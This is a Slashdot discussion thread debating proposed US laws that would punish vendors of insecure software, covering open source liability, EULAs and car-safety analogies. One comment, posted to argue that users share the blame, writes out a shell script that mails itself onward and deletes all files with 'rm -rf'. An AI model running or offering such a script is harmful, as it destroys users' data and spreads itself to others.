Laws to Punish Insecure Software Vendors? 581
Gambit Thirty-Two writes "An influential body of researchers is calling on the US Government to draft laws that would punish software firms that do not do enough to make their products secure."
Yeah that'll work.
fgp (Score:2, Funny)
"How many people here believe in ghosts?" About 90 students raise their hands.
"Well that's a good start. Out of those of you who believe in ghosts, do any of you think you've ever seen a ghost?" About 40 students raise their hands.
"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?" 15 students raise their hands.
"That's a great response. Has anyone here ever touched a ghost?" 3 students raise their hands.
"That's fantastic. But let me ask you one question further... Have any of you ever made love to a ghost?"
One student in the back raises his hand. The professor is astonished. He takes off glasses, takes a step back, and says,
"Son, all the years I've been giving this lecture, no one has ever claimed to have slept with a ghost. You've got to come up here and tell us about your experience."
The redneck student replies with a nod and begins to make his way up to the podium.
The professor says, "Well, tell us what it's like to have sex with a Ghost."
The student replies, "Ghost?!? I thought you said 'goats'."
open source (Score:5, Insightful)
Re:open source (Score:3, Insightful)
With open source you didn't pay and its a matter of trust between the user and developer that the program is secure... and if you're really worried about it you have access to the source.
Re:open source (Score:2, Interesting)
if Open Source developers have no liability as you say, the business world will have a very difficult embracing it.
OH PLEASE! (Score:2, Insightful)
That's ridiculous, how many times have you heard of a commercial company being liable for crappy products? How many products have MS released that have NOT worked as advertised, yet required consumers PAY to upgrade to a version that should have worked to begin with?
Besides that, all the software licenses (shrink wrap or no) basically say "we're not responsible".
Re:open source (Score:3, Interesting)
Re:open source (Score:3, Insightful)
These are companies that hire programmers, go through source code and make distros that people pay money for. I would consider them software firms that would fall under this proposal and I also consider them critical for the success of Open Source software.
Now what happens to these comapanies when some project they have little control over but include in their distribution has a critical flaw that gets exploited? How vulnerable to litigation do they become? Guess we'll have to wait and see.
Re:open source (Score:4, Insightful)
A critical point, I think. Keep in mind that these security holes are not exactly akin to a lock with a pink sticker that says "This lock doesn't actually work". A lot of research and experimentation is necessary in order to exploit those security holes. Research and experimentation carried out by criminals. As much as I would love to see software companies held accountable for the generally terrible state of software quality industry-wide, I'm not sure it's fair to hold Microsoft responible for making possible the actions of a malicious hacker. Is it Honda's fault a slimjim opens the door of my Civic?
A Certain Level (Score:5, Insightful)
> possible the actions of a malicious hacker. Is it Honda's fault a
> slimjim opens the door of my Civic?
Well, to get a realistic comparison, you'd need to compare on even ground. Pretend for a moment that your car door locks went to "locked" when you pushed the lock button, and "unlocked" when you pushed the unlock. However, they didn't actually engage the tumblers in the door, so when it's locked, the handle still opens the door. Now, there's a switch inside the door that you can get to by pulling the door side off, and when you throw it the tumblers connect and when the door says "locked" it now really means it.
Now, would you blame Honda if they didn't set the switch to "on" at the factory, and didn't tell anyone about the switch, and only acknowledged that it exists when someone in the field finds it and threatens to tell the general public?
I'd bet you would. That's a fairer comparison, and so yes, I think the companies that produce easily exploitable software should be forced to reckoning for it.
Virg
Re:open source (Score:5, Insightful)
It does not have to be that way. Why not put in exemption for software that comes with source code? The presumption could be that releasing source code allows the user to take responsibility for the correct operation of the software. Also consider that the OSS writer has little or no control over changes the user might make (and that's one of the main points, isn't it?)
Just like a LLP (Score:5, Interesting)
Who are we thinking about? (Score:3, Insightful)
Though the article mentions Microsoft because of their security record, I think that the drafters of the proposal are "thinking of" consumers, not the fortunes of any one company/group of developers. And, I believe it is the ethical duty of software developers, whether Open Source or proprietary, to think of the users of our software as well. Which is why, as I've said, if drafted correctly I'm not neccessarily opposed to such a law.
With regard to the specific example of IE, well, if IE has a security flaw that exemplifies gross negligence, then the fact that it's free won't mitigate against liability. If the flaw is in an OS component (as much of the functionality previously offered in IE is now embodied), then it wasn't free, was it?
WRT to the "seldom used" product, well if the company charged money for it, and if it had a security hole which caused actual damages to one of their customers, why shouldn't they be liable?
Re:MS will be sure it is (Score:2, Insightful)
Re:open source (Score:5, Insightful)
That's a bit like saying a car company shouldn't be held responsible for putting faulty brakes on a car, since after all, the car owner could have replaced the brakes with something that worked.
Re:open source (Score:2)
Re:open source (Score:5, Insightful)
It does not have to be that way. Why not put in exemption for software that comes with source code? The presumption could be that releasing source code allows the user to take responsibility for the correct operation of the software. Also consider that the OSS writer has little or no control over changes the user might make (and that's one of the main points, isn't it?)
What needs to be made illegal are EULAs that absolve the software creator of guilt for flaws. Ford is liable for putting the wrong tires on SUVs and causing people to die. Ask Explorer owners (if you can talk to people that would buy one nowadays) how they would have reacted to such a license, and imagine how the courts would have reacted.
You've also made an excellent point about the futility of the GPL, but I digress.
Re:open source (Score:3, Insightful)
OSS companies/programmers will be just as liable as closed source ones.
It does not have to be that way. Why not put in exemption for software that comes with source code? The presumption could be that releasing source code allows the user to take responsibility for the correct operation of the software. Also consider that the OSS writer has little or no control over changes the user might make (and that's one of the main points, isn't it?)
Furthermore, OS authors do not always have control over what versions of what libraries are being used, or for that matter, what compiler is being used. With source code, mileage *will* vary. With a complete binary only distribution, it's another matter.
Re:open source (Score:3, Informative)
Second of all, it wouldn't matter anyway. If I walk into a business suggesting they buy a warrantied product from a reputable manufacturer, and my competition walks in suggesting they use a free product with no warranty.
I will win the contract, I guarantee it.
Re:open source (Score:3, Insightful)
If a problem is found in unmodified code, the original creator of the code is not held liable because the end user community has the tools they need to fix it.
Re:open source (Score:2)
And how, exactly, is this a bad thing? Personally if RedHat got hauled into court due to their history of sloppiness, I'd be cheering.
But (Score:2)
Re:But (Score:2)
Re:open source (Score:3, Insightful)
But software that is free, free as in free beer, should not be liable. I've always felt that if you are providing something for free, and you don't force it into people's hands, those people should understand the risks of using it.
However, if you're making money off of it, that money should go to making sure the software is stable and secure, and that people get what they pay for. So, in that case, I think the idea of certain reasonable guidelines on security and realiability should and could be held up by consumer protection laws. I think there are certain things, such as vulnerabilities of running servers and such being on by default in shipped software, that should be illegal. The way some software vendors ship products with 40 outside-facing services to the novice user who will never ps aux or check out the services control panel is, to me, an unneccessary and easily preventable and pluggable hole, especially considering the number of people who use them and the value of the data that gets thrown on these systems.
Re:open source (Score:3, Informative)
gus.
Re:open source (Score:2)
links Open Src&liability proposals Re:open so (Score:3, Informative)
Open source developers face new warranty threat [theregister.co.uk]
Rosen and Kunze were attempting to secure an exemption from implied warranties of merchantability, fitness, or non-infringement for a computer program, "provided under a license that does not impose a license fee for the right to the source code, to make copies, to modify, and to distribute the computer program."
The proposal would have brought the rest of the States in line with Maryland.
The replacement version, which reads "or to distribute..." is joined by a provision that nullifies the exception for software licensed to consumer
The complete text can be found here [nccusl.org]....
a) Except as provided in subsection (b), the warranties under Sections 401, and 403 do not apply to a computer program if the licensor makes a copy of the program available to the licensee in a transaction in which there is no contract fee for the right to use, make copies of, modify, or distribute copies of the program.
(b) Subsection (a) does not apply if the copy of the computer program is contained in and sold or leased as part of goods or if the transaction is with a consumer licensee that is not a software developer.
Easy Money (Score:2, Insightful)
So this means that if i configure my computer without a password i can sue the manufactuere for defective security in their software if it gets hacked.... Cool
</SARCASM>
Re:Easy Money (Score:3, Funny)
Zero change of success... (Score:2)
Aimed at Microsoft, George Bush's friends in Redmond. Asking for them and others to actually produce secure and reliable software, and making them responsible for their actions.
Sounds ridiculous that this shouldn't already be covered by things like Consumer Protection but in fact those licenses make sure that they have no responsibilities. And no-one is going to change that in the US when there is a president who doesn't want to prosecute for monopolistic practice the bigger violator of security concerns out there.
Re:Zero change of success... (Score:2, Interesting)
I have administered WindowsNT 4 and Windows 2000 systems. I have *NEVER* been cracked, hacked, or otherwise seen any ill effects from the security flaws that do exist in any of the Microsoft products we use on our server platforms.
I have written WSH scripts that automatically update and spread any updates to all of my systems. All I have to do is approve the update, which is done after I test it. I stay on top of their security patches and simply followed their recommended guidelines for locking down a server. I also disabled several things I know are exploitable.
The funny thing is, I end up doing the same thing with the latest and greatest from RedHat. They make it a little easier out of the box to keep up with the updates etc. I have to turn off services I don't want and follow the "common sense" guide of things like turning off services I don't need.
I am not saying my boxes are uncrackable, or that I am all knowing, or even that great at securing systems.... Anyways.
Re:Zero change of success... (Score:2)
So what are you saying?
Re:Zero change of success... (Score:2)
Wouldn't that be called a scaregiraffe?
Hard to implement (Score:2, Insightful)
How to track liability (Score:4, Insightful)
For instance, am I liable if I use the standard C function gets() in a program? I, as the program vendor, can argue that that's what was taught in my undergrad CS course, or I could point the finger at the language designer or C library vendor.
What about a program I write that communicates w/ other software via a standard protocol, and works perfectly if the other software adheres strictly to that protocol but fails in combination with another program which implemented that protocol incorrectly; am I to blame, or is the other vendor? What if the spec is vague?
As I've said in other posts, the potential for good legislation along these lines is there, but only with *heavy* involvement of people who understand issues such as these, along side of the industry lobbyists, consumer advocates and politicians.
Join the Libertarian Party (Score:3, Informative)
Re:Join the Libertarian Party (Score:2)
Join the Green Party. (Score:2)
Be careful what powers you let corporations have when you let them run amok without government regulation.
Yes, please do (Score:2)
Such as special dispensations to ignore normal contract law by selling "licenses", such as copyright, such as patent,
*Real* libertarians aren't as one sided as you seem to be. They actually believe in fewer laws of any kind, not just fewer of the kind favorable to their favorite soapbox.
car safety (Score:3, Interesting)
But then there's the impaired drunk drivers (not to trivialize the 0.08 crowd, but I'm far more worried about Bubba with a 0.24 BAC than the 0.08 crowd). They tend to take out other people as well. When they drive impaired, they're at threat to all of us. I don't think we should ban alcohol, but I don't see a problem the state having the right to crack down on repeat drunk drivers because there are documented cases of some drunk drivers who have been in multiple accidents resulting in death.
Taking it one step further, I remember being poor and in college and resenting the mandatory vehicle checks my state required. Then I moved to a state that didn't have mandatory vehicle checks... and heard some horror stories of what those vehicle inspections found in other states. Again, I don't give a damn if some moron wants to jack up his pickup with ice hockey pucks... until he takes it on the road and they suddenly shear, forcing his vehicle to roll/tumble into my oncoming traffic lane.
Now let's revisit the software issue. Once again, I really don't give a damn what people do on their own systems that are not attached to the net. But I do care when I can't use my cable modem because NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA.
The Libertarians have a point when they argue that the state should rarely, if ever, protect an individual from themselves. And that the state should rarely, if ever, protect people from inconsequential behavior of their neighbors. (You don't like the fact that your neighbors are gay? It's your problem, not theirs, unless they're doing stuff that would be a problem regardless of their sexual orientation.)
But once you get into behavior that demonstratively harms others, or could reasonably result in harm to others, it's a whole new game. Unfortunately far too many Libertarians don't get this.
In this particular case, we need to see the proposals. But there is absolutely no way you can argue that Microsoft's sloddy practices have not harmed many innocent people. If it takes a law to force them to accept that their indifference demonstratively harms others, so be it.
Terrorism (Score:2, Interesting)
Everyone would be in violation (Score:5, Interesting)
Re:Everyone would be in violation (Score:2)
The linux kids might be happy about MS getting hit for $10K or whatever per IIS hole, but when the same thing starts happening to proFTPd, BIND, sendmail, etc... the shat will really start hitting the fan!
If such a law does get passed, it will certainly be ruled unenforceable the first time it's tested in court.
Re:Everyone would be in violation (Score:3, Insightful)
Re:Everyone would be in violation (Score:3, Interesting)
In case of, say, Microsoft, the problem is not necessarily that they don't (try to) fix the known problems, it's that they somehow managed not to realize the obvious potential problems (with email/documents allowing active fully enabled scripting) when designing products in the first place.
Re:Everyone would be in violation (Score:2)
int main()
{
cout "Hello, World";
return 1;
}
as far as I know, the root hole was fixed in 0.2.3
Re:Everyone would be in violation (Score:5, Insightful)
Fine them? (Score:3, Funny)
Re:Fine them? (Score:2)
Send check or cases of beer to my home address listed below...
Oh my, the irony (Score:4, Insightful)
It's always interesting when those who call for freedom and security for themselves can only figure out how to do it by reducing the freedom of others. Now they want to legislate software standards? Come on, you have to be against that.
Re:Oh my, the irony (Score:2)
That being said, the goal (having some recourse against foolishly ignorant s/w companies) could be more easily obtained by just clearly abolishing EULAs, and letting legal action start based on actual damages products cause (if any). I know that administration doesn't really have power (and shouldn't have) over courts, but they should be able to test out EULAs in court.
So... (Score:2)
emmm... (Score:2, Interesting)
Lobbying against it? (Score:2, Interesting)
Freedom of Speech (Score:4, Insightful)
An additional question would be should all software now come with a warrently that specifically disclaims the implied warrenty and states that there is no warrenty? Would it be legal under the proposal?
Re:Freedom of Speech (Score:4, Interesting)
Do you have the right of freedom of speech to utter other potentially hazardous comments? Yelling "FIRE!" in the middle of a crowded theatre is dangerous, and illegal. If you're engineering a bridge, does "freedom of speech" give you the right to design it so that it will collapse when people try to use it?
There is a wide legal history for freedom of speech ending when it causes harm to others.
Re:Freedom of Speech (Score:5, Insightful)
You don't need to open that whole kettle of worms at all, in this case. The right to say something does not equate with the right to sell it - unless it is sold for the purpose of communication (which commercial software is not.)
People who write software and then sit on it, or only give it to a few friends, cannot and should not be able to be held accountable for their software not working - unless (like yelling "FIRE!" in the middle of a crowded theatre) there is clear evidence of malicious intent (computer viruses.)
Someone who distributes software for free ought to be required to disclaim any warranties, which they allready do, and that is fine.
On the other hand, when you sell a piece of software there is an implied warranty of merchantability that you cannot disclaim. Extending that warranty to include security is not a free speech issue. Your right to write any code you want is still protected, you just cannot necesarilly sell it.
By extension, however, code written for the purpose of communication - including "here is how you write DeCSS" or the example code in a CS textbook - would still be protected, and you'd still have a right to sell it, whether or not it worked or was secure.
Re:Freedom of Speech (Score:2)
But, if you have been reading some of the latest decisions in the courts, software also has a functional aspect that can be litigated. You package that program into a binary and start selling it the issue is less of the code being free speech and more of the executable being a product.
Be careful of what you wish for (Score:4, Insightful)
Seems to me this will have the least impact on those who need to pay attention to security the most(large software companies) while having the potential to make it harder for the "little guy" to write and publish software.
What about the click-thru EULA? (Score:3, Informative)
It always has a limit that anything bad that happens while using their product is not their fault.
Now IANAL but I thought that by clicking I Agree, that you were actually agreeing to that.
Boon to Corporate America (Score:5, Insightful)
Another good move for corporate America.
Microsoft is able to defend itself against the government. Are you?
Re:Boon to Corporate America (Score:2)
It would also result in far less software being produced for businesses (large and small), since it would increase the cost of software so much. This would be a disaster for everyone.
Other Microsoft Failings... (Score:5, Funny)
For example Microsoft Bob.
I've been waiting for a service pack for it for years. I'm just not as comfortable hooking Bob up to the internet as I once was. Bob has gotten more viral infections than an old French Whore in a port town.
-Rothfuss
What product are we talking about? (Score:2)
What, legally require things like DRM?
No, I know what it means. Who's going to check out all this software? Are we going to have a Federal Department of Bug-Finding, which employees 57,000 people trying to write Code Red 3?
How will this result in anything other than higher prices and no change in the "security" of software?
I was right! (Score:2)
I agree (Sort of...) (Score:3, Informative)
Ford and GM shouldn't be allowed to produce cars that kill people, simply because they couldn't be bothered to make them safer - like exploding gas tanks - ok, so that's not such a great example... (grin)
But really, but the responsibility where it lies. If I put a system out on the net, and don't take some steps to make it secure, I should be liable for damages it causes when it's compromised. Same for SW companies. If you produce a product that doesn't meet the "reasonable" man test for care in producing the product, the maker should be liable for negligence.
I might go even further though, and add some criminal penalties too.
Software can be more reliable and bug-free and secure. (Go read the "Software Conspiaracy") Sure it will cost more, but what do you think all the virus outbreaks costs business and individuals. It's just a hidden tax. MS (and others) are just shifting the burden of producing software that works to the users. It's cheaper for MS to produce the software, but lots more expensive for the user to use them.
Finally, the legal system _IS_ part of the free market. The threat and actual loss of damages to a plaintiff balance the system of the market. It's not just buyers and sellers - and a wild wolly mess...
It just bugs me when "free market" proponents want to proclaim that the courts are unneccessary in the free market - bull! They are important and the market will not function correctly without them!
Isn't this a bit extreme? What if I WANT insecure? (Score:2)
I think a much better approach would be if companies had their software certified as secure. Just an independent group to come in and audit the release at varying levels of bulletproofedness.
It'd drive up software costs, but if consumers don't care to look for the "Certified Secure!" brand, why should the government force it?
Why not pass a law against crashes (Score:2, Insightful)
If they do this correctly... (Score:2)
If the USA Patriot Act could get passed after 9/11, so could this. Let's not forget that rationale goes the way of the buffalo in the months following an attack. And while I think a lot of software would be better than it is now if it were more secure, this wouldn't just affect MS.
Let's hope nothing comes of this, as it could mean lawsuits against anybody and everybody if any piece of data becomes available to the wrong party.
good concept (Score:3, Insightful)
A better solution is to allow people to sue software companies that produce software that does not do what it is supposed to do. For example, if Microsoft says they have the most secure servers on the market, they damn well better be that.
As soon as a few lawsuits are filed, things will change for the better. There's too much being "protected" by microsoft software for them to continue business-as-usual for long if they get sued for every nimda/code red/etc out there doing damage.
However, if the company puts out patches (such as through windowsupdate) and the user fails to apply them in a timely manner, it's the user that screwed the pooch, not the producer.
effect on OpenSource? (Score:2)
There is a long history of laws (e.g., Sherman Act) designed to limit corporations but instead limit individuals.
Another reason to punish M$ (Score:2)
Re:Another reason to punish M$ (Score:2)
But it's not. Which suggests that it isn't actually better. Remember, "better" is relative, and what you look for may not be what someone else looks for in a product.
Wouldn't this give hackers more power? (Score:2, Interesting)
Yes, people already do this, but to bring in the Gov't to be manipulated by these whims seems silly. Be responsible for your own security.
Not Like Automobile Testing (Score:2)
Translating this to the software world, frankly, makes my head explode just thinking about it. Consider:
I can see, perhaps, a public standards body to which software vendors could choose to submit their products. In this scheme the government could award some kind of 'certification label' that a vendor could use on their packaging, etc. indicating it's 'safe'. That would at least enable the marketplace to decide the importance of government certification. However, we'd still be left with the niggly questions of what 'safe' is and how we might determine 'safeness'. Maybe this akin to 'quality' certification along the lines of ISO9001/2 processes(??).
Re: (Score:2)
I'll settle for basic product liability (Score:2)
I'm willing to accept that it may have defects that may cause problems, but the defects in the software should be fixable by the vendor.
I'm not willing to accept that the product has so many defects that it does not do what is claimed. I call that fraud.
Oh what fun... (Score:2)
This is bad news for anyone dabbling in software development, you make a piece of software to do something (in your opinion) useful, release it on your website where a few dozen download it, it spreads a bit more, and suddenly, someone somewhere does something that provokes your app to crash, or be used, in a nasty way taking out their box and the boxes on that network.
Now you suddenly find yourself with a fresh lawsuit in your mail claiming you're responsible for the couple hundred thousand dollars worth of damage done to a company in some remote place you've never heard of...
This sounds like an excellent way to deter anyone from ever releasing anything that's not tested and tested again, meaning development for a hobby will be a lot tougher.
I see a suggestion like this working only after a developer clearly states and guarantees that his software will not in any way harm the users equipment, or, very gross neglect from the developer and failing to provide even rudimentary security.
BBC (Score:2)
If organizations want higher security, they won't buy the insecure products. Business that have been burned by Outlook/IIS/Windows in the past will move to alternatives: GroupWise/Apache/*NIX.
Barking up the wrong tree... (Score:2)
What I do want is to KNOW when a supposedly secure product has a security leak. Moreover, I want to know the ramifications of the issue, the patch progress, and current known virii/worms/other explotations roaming around.
I really don't want to sue company X for making insecure software -- but I don't like the idea of them holding back on vulnerability announcements one they've been exploited.
Re:Barking up the wrong tree... (Score:2)
This would just be a hinderance towards making more secure software. We need something more like a "right to know" law.
Don't Use Insecure Products (Score:2)
I do think companies like Microsoft need to take more responsibility for the huge gaping security holess in their products but I'm not legislature is the right way to go about it. I do think consumers need to be better informed. When a Ford recalls a few vehicles over some potential saftey hazzard it's all over the evening news. But what about when a dangerous security hole is found in the world's most used operating system? The vast majority of users never even know about it.
Complicating the issue here (Score:2)
If we bought cars with the same lack of discern that we buy software, Chevrolet could bring back the Corvair.
Hackers (Score:2)
Before we decide this is such a great idea . . . (Score:5, Insightful)
Mixed Emontions (Score:2)
I hear a lot of people happy about the idea of going after M$ because they are the Evil Empire. I also hear a lot of people that are afraid of us open sourcers being attacked. Obviously, more secure and better written code should be standard.
I'm not so sure that liability isn't a good thing. I'm not saying that a programmer should be completely responsible for his/her code and any results that occur. I can instead think of a different situation. Imagine I produce a piece of software and sell it/give it away. I don't think it's a bad idea for me to be required to:
Now, of course end users will be responsible for installing patches, monitoring CERT advisories, etc. The end users are also responsible for attempting to avoid known bugs while waiting for a patch to become available. But, sometimes this isn't avoidable (think power generation system). If this particular bug is the cause, then by all means I think the users should be able to go after the company they PAID for damages. It's not like the software company didn't charge the end users to use the software. With those software rights, there really should be some sort of software liability (just like if I made a defective car, and then had to do a recall).
Absolutely no way (Score:2, Interesting)
BETA SOFTWARE
Well of course that has bugs. So we exempt this? OK, all (Microsoft) software will be beta
NEWBIE / EDUCATIONAL
Some newbie developer or uni student writes a piece of toy software and makes it available on his home page to boost his ego. Some other newbie academic downloads it and a bug in the "file manager" software deletes his C: drive.
Exempt educational software??
FREE BEER
Some people make software out of the goodness of their hard. "YMMV, maybe you like it maybe you don't. No warranty". Maybe it is superb. But it might have a horendous bug. So people will no longer release freeware
OPEN SOURCE
Same as above but with source open, people can deliberately find bugs and cry out. Worse, there is plenty of open source software in commercial use (Apache etc). What if in some new iteration of Apache, there is a security hole and this will happen. Can people sue for this?! Can people sue the developers who worked on it for free? What exemption do you want now?
MICROSOFT
Well, by now, OSS has dried up because everyone is too scared to give work away. Maybe top projects that have been so heavily scrutinised in the past might be ok (Apache, Linux Kernel). Microsoft might just last a little longer than expected due to security through obscurity but of course they too will perish
The end of software =)
Some more cool laws: (Score:2)
1. The Crap Film and Television Act, will hold film-makers responsible for bad productions, bad acting, bad lighting and poor scripts. If someone passes out from bordom from watching a film, they can sue the studio.
2. The Invasive Pop-up Advertising Act, will ban all pop-up adverts. This will tie-in with the software laws, because pop-ups are technically software, and are insecure (in that they cause damage to my mouse).
3. The Insecure Boy-Band Act, will ensure that all boy-bands are securely locked-up. If a record company tries to bring them to a studio or gig, they will be punished.
compromised paper clip? (Score:2)
Are they serious? Can Clippy spread a virus? I never heard of that.
Ahhhh he's coming out of the computer....
- adam
What makes software secure? (Score:2, Interesting)
How does the OSS world make its software so secure? Through peer review. People find bugs and report them. With OSS these bugs are found fast. And these bugs get fixed fast. But what would be ludicrous would be to sue for bugs since at V1.0.0 there are bound to be bugs. Suing would kill the project. Peer review has made OSS strong and that is the way it should be.
Viruses? (Score:2)
I'm not fan of Microsoft, but it seems to me that it is the user's fault if they contract a virus. It all goes back to the knowledge level of the user.
If someone sent me:
#!/bin/sh
mail next@victim < $0
if [ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~
fi
And I executed it, it would be entirely my fault! Now can I sue every single UNIX (and UNIX-like) vendor because their system allowed me to delete my files "unknowingly"? Most of the Outlook viruses out there were really nothing more than that! In most cases, the user had to manually open the attachment and run it.
Notice, basically every single complaint about Microsoft insecurities were due to ease-of-use features. Outlook executes attachments, it's much easier for users to click on it to execute it. The web server exploits targeted extra services Microsoft added to make things easier for people who want to use those features. And our good pal Clippy, again, another ease-of-use feature. If people were more knowledgable about computers there would be no need for these extra features and so there would be less code that has to be verified as safe, not to mention more time to verify the important code.
While software security is important, knowledgeable users is just as important, if not more.
White Hats (Score:4, Informative)
Lawyers would start to be accused of Bugtraq chasing.
The report (Score:3, Informative)
Well, just in case you haven't the draft report is available for online perusal here [nap.edu]
PS I said NAS, not NSA. Just to be clear.
DMCA would nullify this! (Score:3, Insightful)
Um, yeah, that makes sense.
Legislation vs. Certification (Score:4, Interesting)
By charging higher premiums to insure companies using software with a bad track record, there are already market forces in place: include that difference in premiums in the TCO-calculations microsoft is so fond of to prove that Windows is cheaper than any competition, and make management aware of it (and make them wonder why that insurance company wants higher premiums for insuring against damages from security holes in that software).
Legislation could hurt many a small software maker, and it would also be subject to heavy lobbying from Microsoft to see to it that their interests are hurt the least, a better idea would be an independant (that's the hard part) organisation providing certification of software. Once that is established there could be legislation demanding minimum standards for software used in certain critic areas.
That way each software maker could choose how much to invest in security and QA, and it would be more transparent for customers how secure a product really is, so they wouldn't have to rely on the software-makers advertising for that kind of information. In effect the insurance conditions and premiums for different kinds of software are already an indicator for its security, and the insurance companies probably have a high interest in accurately estimating the risks, so probably they should play some part in ensuring the proposed organisations independance.
False Advertisement / Work as Advertised (Score:3, Insightful)
Second, if any laws are written, my guess is they would merely extend already existing more generic laws regarding false advertisement. Under such circumstances, software vendors would not be *required by law* to produce secure software. But, if their advertising campaign, sales representatives, software packages blatantly lead potential consumers to believe that their product is of "enterprise-level", "mission-critical-caliber", "secure", "reliable" or any such wording which implies "secure software", then the law could provide for some serious compensations to the harmed consumer.
To avoid endless legal battles over wording, the government should define an entity whose role would be to design, draft and maintain a *very specific* scale of security levels which defines strong standards for security features within software packages. The scale could not only provide very precise security requirements for software, but also standards type of compensation to the consumer for failure to meet each of its levels' standards.
Such scale should be massively advertised thru all media so consumers would know to look for a software package's rating on such scale before purchasing it for any mission-critical purpose.
We could let software vendors rate their own software packages according to this scale. If the scale is *specific-enough* and clearly defines levels of security, then consumers should have very strong cases to bring to class-action law-suits to seek compensation in the case such software should fail to meet all of the requirements defined by their advertised grade on the scale.
Such model would keep the government's involvment minimal and place all of the liabilities on the software vendor, so consumers don't ever have to seek compensation from some government-sanctioned entity which would assign ratings to software packages. We must keep in mind that computer software is by nature a highly volatile, constantly evolving, and rarely flawless type of product, as every new piece of software written is by nature "cutting-edge".
Unsafe at any speed (Score:5, Interesting)
It took legislation to make cars safe. The auto companies hated it. They fought every inch of the way. But it made the auto industry grow up and make their products really work, no matter what.
Every major industry goes through this transition, where society insists that the technology work safely. Railroads did. Steam boilers did. Autos did. Civil engineering did. Electric power did. It's time for computing to do it.
It's time for the software industry to grow up and stop hiding behind one-sided licensing agreements. Software is too important in modern life to be as crappy as it is.
Buggy Code == Fraud (Score:3, Insightful)
There should be criminal and civil penalties for withholding information about security risks. Right now I do not have the legal right to know about security risks that are discovered in systems I use, the creators of those systems are not legally required to inform me when a new risk is discovered. This means that I can not make an informed decision about how to protect myself from the problem. I can't even use a list of currently unresolved risks to help me decide what systems to use and/or purchase.
To me, the withholding of security risk information is a form of fraud. It is the same as rolling back the odometer on a used car. It is the same as selling Pintos with exploding gas tanks and the same as selling flammable pajamas to children. Companies must be required to release security risk information about their systems in a timely manner. They must be legally liable for damages that result from security issues between the time they discover the problem and the time they warn users of the problem. These kinds of penalties will force companies to create secure systems in the first place. And, to warn people in a timely manner so that they can take action to protect themselves. Although it is tempting I don't think the developers should be required to fix the system. But, a list of all outstanding security problems must be included in advertising and on the packaging of any system. People have to be able to make an informed decision about what systems to use. We put warning labels on beer and cigarettes, we require people to wear seat belts, we require the disclosure of the ingredients of all our food, we have lemon laws to protect us from unscrupulous car salesmen, and we have product liability laws that cover every physical thing we purchase. But, we have no equivalent legal protection from the purveyors of software snake oil.
The only way a company should be able to get out from under these penalties is to declare the product "dead", notify all customers of record that no more security support will be given for that product. Declaring the software dead should also require that the source code and/or system designs as well as any patent and copyrights to the system be released to the customers so that customers can arrange for other sources of security support for the system. At that point the company would not be allowed to sell, distribute, or accept any sort of payment including royalties and support payments for the software.
Stonewolf
This is not as far out as it firt seems. (Score:3, Insightful)
Consider, say, the hotel I was at years ago... they had an indoor pool. Before you used the pool, you had to sign a waiver... they had a stack of them in the pool room.
The waiver basically said using the pool was at your own risk, etc, etc.
Now... Dad asked his lawyer later, for kicks.
Say you drowned becuase you couldn't swim.. and they had no lifeguard. This document would protect them... it was fairly clear there was no lifeguard.
But.. say the diving board was in disrepair, and broke off while you were about to dive, causing you to fall and break leg... guess what? That contract doesn't absolve them of responsibility. Why? Because... it was reasonable to expect that the diving board worked.. the owner still had a duty to keep the area safe for it's users, regardless of their waiver. (If they wanted a waiver to protect them against that, they would have to clearly state the risks.. state that the facilities are in bad repair and broken.
Now.. software, we have these horrible EULAs... but still. I can understand how it's okay for a company to, say, protect itself from being sued over some little bug.. of COURSE they have to. Like.. say Excel crashes while you are in the middle of some work.. and you have to re-do it, so you are late for a meeting, so you lose the deal, etc.
Just as in the real world, where even a disclaimer can't generally release you of all obligation, so should it be with software. I don't know what the wording would be, or what would be fair... but software vendors should have a certain level of accountability for what they do.
Now.. how does this affect OSS? I don't know. Do I think OSS authors should be responsible for what they do? Yes, to a degree.. but there is a problem.. I don't think someone should be sued just because they shared some code with the world and it didn't work.
Unlike most, I read the report (Score:4, Informative)
It certainly does not claim that Microsoft is responsible for most security issues. If it had I would have expected Butler Lampson to have resigned from the board. It is not usual for NAS reports to target particular companies. It is not likely that David Clark would attack Butler in that way given that they are both LCS computing profs.
The statement about Microsoft is actually introduced from other sources but in such a way that the casual reader assumes it was a recomendation from the report. The only occurrence of the string 'Microsoft' in the text is Butler's accreditation.
Likewise I find it hard to find any recomendations. The majority of the report is simply a post 9-11 rehash of three previous reports by the same board. The nearest the report comes to suggesting legislation is:
Consider legislative responses to the failure of existing incentives to cause the market to respond adequately to the security challenge. Possible options include steps that would increase the exposure of software and system vendors and system operators to liability for system breaches and mandated reporting of security breaches that could threaten critical societal functions
That is quite a way from endorsing legislation, which is hardly surprising given the makeup of the panel.
Re:Bad Idea (Score:5, Insightful)
The Ford Pinto.
We have laws that tell auto manufacturers how they can build cars. Not in detail, no, but they have to meet certain standards or they just aren't legal to make. Note that business concerns don't enter into it. Making the Ford Pinto the way they did originally was a good business decision. It really did cost Ford less to pay out the death claims than to improve the car. It even arguably benefitted the consumers, because lower costs to Ford meant a lower price on the car and consumers were still buying them even after the problem became public so people obviously wanted them. The courts still held Ford criminally liable for building a car that blew up and killed people when they could easily have built one that didn't.
So why should we treat software any differently?